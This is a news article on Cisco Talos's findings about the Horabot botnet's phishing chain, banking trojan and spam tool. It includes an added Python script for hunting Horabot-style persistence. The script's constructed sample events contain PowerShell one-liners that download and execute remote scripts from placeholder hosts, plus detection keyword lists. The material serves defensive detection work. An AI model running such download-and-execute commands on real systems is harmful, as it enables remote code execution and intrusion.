Horabot campaign targeted businesses for more than two years before finally being discovered
The newly-discovered Horabot botnet has attacked companies in the accounting, investment, and construction sectors in particular


Security researchers have issued a warning over a sophisticated malware botnet that has flown under the radar for more than two years.
Analysis by security firm Cisco Talos also found that organisations across “several business verticals” have been targeted by the botnet since November 2020.
Dubbed ‘Horabot’, the botnet was spotted infecting devices with a banking trojan and spam tools to steal sensitive financial information and assume control of user email accounts to wage phishing attacks.
Users of email services such as Gmail, Yahoo, and Outlook have been impacted by the botnet, with their accounts used to send malicious emails to their contacts.
“Horabot enables the threat actor to control the victim’s Outlook mailbox, exfiltrate contacts’ email addresses, and send phishing emails with malicious HTML attachments to all addresses in the victim’s mailbox,” researchers said.
“The banking trojan can collect the victim’s login credentials for various online accounts, operating system information and keystrokes. It also steals one-time security codes or soft tokens from the victim’s online banking applications.”
According to Talos, the botnet has specifically targeted Spanish-speaking users in the Americas, and could be based in Brazil.
Companies operating in the accounting, construction, engineering, and investment sectors are thought to have been particularly targeted by the botnet.
How does Horabot work?
Technical analysis from Cisco Talos revealed that the campaign is a “multi-stage attack chain” beginning with an initial phishing email. This then delivers a malicious payload via a PowerShell downloader script.
“When a victim opens the HTML file attachment, an embedded URL is launched in the victim’s browser, redirecting to another malicious HTML file from an attacker-controlled AWS EC2 instance,” researchers said in a blog post. “The content displayed on the victim’s browser lures them to click an embedded malicious hyperlink which downloads a RAR file.”
The payload delivered by the RAR file creates specially crafted Windows shortcut files that run when the victim's machine starts up, and then forces the machine to restart.
Upon reboot, these malicious files enable the attacker to further infect the device.
“After the victim’s machine is rebooted, the malicious Windows startup files run the payloads by sideloading them to the legitimate executables and downloading and executing two other PowerShell scripts from a different attacker-controlled server,” the blog post explained.
“One is the PowerShell downloader script, which the attacker attempts to execute to re-infect the victim’s machine, and another is Horabot.”
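The chain described above (a script host dropping a shortcut into a Startup folder, a forced reboot, then PowerShell pulling further scripts from an attacker-controlled server) is something a detection engineer can hunt for in endpoint telemetry. The following is an added example, not code from the original article and not Cisco Talos's detection logic: it runs three heuristics of my own over constructed, Sysmon-like process and file events, and correlates them into a single "chain" finding. Event field names, the sample command lines and the 203.0.113.x addresses are all assumptions made up for the example.

```python
"""Hunt for a Horabot-style Startup-shortcut persistence chain (added example).

Assumptions (mine, not Talos's rules): events are dicts with keys
event, time, image and either target (FileCreate) or cmdline/parent
(ProcessCreate), plus a synthetic SystemBoot event. Sample data is constructed.
"""
from dataclasses import dataclass
from datetime import datetime

# Per-user and all-users Startup folders both contain this path fragment.
STARTUP_MARKER = "\\start menu\\programs\\startup\\"
# Processes that should not normally be writing shortcuts into Startup.
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Common PowerShell download primitives (case-insensitive substring match).
DOWNLOAD_PRIMITIVES = ("downloadstring", "downloadfile", "invoke-webrequest",
                       "start-bitstransfer", "net.webclient")


@dataclass
class Finding:
    rule: str
    time: str
    detail: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _ts(stamp: str) -> datetime:
    return datetime.fromisoformat(stamp.replace("Z", "+00:00"))


def hunt(events: list[dict]) -> list[Finding]:
    """Return findings for: Startup .lnk written by a script host,
    PowerShell download activity, and the full lnk -> reboot -> download chain."""
    findings: list[Finding] = []
    lnk_written_at = None   # when a script host last dropped a Startup .lnk
    booted_at = None        # the reboot that followed that drop
    for ev in sorted(events, key=lambda e: _ts(e["time"])):
        kind = ev["event"]
        if kind == "FileCreate":
            target = ev["target"].lower()
            if (target.endswith(".lnk") and STARTUP_MARKER in target
                    and _basename(ev["image"]) in SCRIPT_HOSTS):
                findings.append(Finding("startup_lnk_by_script_host", ev["time"],
                                        f"{_basename(ev['image'])} wrote {ev['target']}"))
                lnk_written_at = _ts(ev["time"])
        elif kind == "SystemBoot":
            if lnk_written_at is not None:
                booted_at = _ts(ev["time"])
        elif kind == "ProcessCreate":
            cmd = ev["cmdline"].lower()
            if (_basename(ev["image"]) == "powershell.exe"
                    and any(p in cmd for p in DOWNLOAD_PRIMITIVES)):
                findings.append(Finding("powershell_download", ev["time"], ev["cmdline"]))
                # Correlate: download happening after a reboot that followed the .lnk drop.
                if booted_at is not None and _ts(ev["time"]) >= booted_at:
                    findings.append(Finding("horabot_like_chain", ev["time"],
                                            "Startup .lnk -> reboot -> PowerShell download"))
                    booted_at = None  # report the chain once per reboot
    return findings


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
STARTUP = "C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"

# Constructed sample telemetry, not real captures.
SAMPLE_EVENTS = [
    {"event": "ProcessCreate", "time": "2023-05-30T09:12:03Z", "image": PS,
     "parent": "C:\\Program Files\\WinRAR\\WinRAR.exe",
     "cmdline": "powershell.exe -w hidden -c IEX((New-Object Net.WebClient)"
                ".DownloadString('http://203.0.113.10/stage.ps1'))"},
    {"event": "FileCreate", "time": "2023-05-30T09:12:05Z", "image": PS,
     "target": STARTUP + "update.lnk"},
    {"event": "FileCreate", "time": "2023-05-30T09:12:06Z",            # benign installer
     "image": "C:\\Windows\\System32\\msiexec.exe", "target": STARTUP + "Slack.lnk"},
    {"event": "SystemBoot", "time": "2023-05-30T09:13:40Z", "image": ""},
    {"event": "ProcessCreate", "time": "2023-05-30T09:14:02Z", "image": PS,
     "parent": "C:\\Users\\alice\\AppData\\Local\\Temp\\legit.exe",
     "cmdline": "powershell.exe -ep bypass -c Invoke-WebRequest http://203.0.113.11/a.ps1 -OutFile $env:TEMP\\a.ps1"},
    {"event": "ProcessCreate", "time": "2023-05-30T09:14:03Z", "image": PS,
     "parent": "C:\\Users\\alice\\AppData\\Local\\Temp\\legit.exe",
     "cmdline": "powershell.exe -ep bypass -c Invoke-WebRequest http://203.0.113.11/h.ps1 -OutFile $env:TEMP\\h.ps1"},
    {"event": "ProcessCreate", "time": "2023-05-30T09:30:00Z", "image": PS,     # benign
     "parent": "C:\\Windows\\explorer.exe", "cmdline": "powershell.exe -c Get-Date"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f.time, f.rule, f.detail)
```

The individual rules are noisy on their own (administrators do run Invoke-WebRequest, and some installers are script-driven), which is why the chain finding, tying a script-host-written Startup shortcut to a reboot and a subsequent PowerShell download, is the one worth paging on; the single-rule hits are better kept as hunting leads.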
Analysis of the banking trojan
Analysis from Talos found that the banking trojan used in this campaign specifically targets the victim’s login credentials and financial information.
This trojan enables the attacker to monitor activity on a victim's device by collecting system information such as hostnames, IPv4 addresses, OS version information, and details of any anti-virus software present on the machine.
Data gathered by the trojan is then exfiltrated to an attacker-controlled server, researchers added.
“The reconnaissance data is exfiltrated to the attacker-controlled server through an HTTP POST request,” Talos explained. “The banking trojan targets the victim’s sensitive information, such as login credentials and financial transaction security codes, and logs keystrokes and manipulates the victim machine’s clipboard data.
“The trojan also has anti-analysis and anti-detection capabilities to evade the sandbox and virtual environments.”
Phishing spam tool
The second element of this botnet campaign involves the use of a spam tool, researchers explained. This acts as a secondary payload during the attack and enables the threat actor to assume control of the victim’s email accounts.
“The spam tool is a 32-bit DLL written in Delphi and, when run on the victim’s machine, will attempt to compromise the victim’s login credentials for webmail services such as Yahoo, Gmail, and Hotmail,” Cisco analysts explained.
Once user credentials have been compromised, this tool takes “full control” of the account and begins creating and circulating spam emails to contacts found in the victim’s mailbox.
This spambot also displayed “information-stealing capabilities”, including the ability to log keystrokes, capture screenshots, and track mouse activity on an infected computer.

Ross Kelly is ITPro's News & Analysis Editor, responsible for leading the brand's news output and in-depth reporting on the latest stories from across the business technology landscape. Ross was previously a Staff Writer, during which time he developed a keen interest in cyber security, business leadership, and emerging technologies.
He graduated from Edinburgh Napier University in 2016 with a BA (Hons) in Journalism, and joined ITPro in 2022 after four years working in technology conference research.
For news pitches, you can contact Ross at ross.kelly@futurenet.com, or on Twitter and LinkedIn.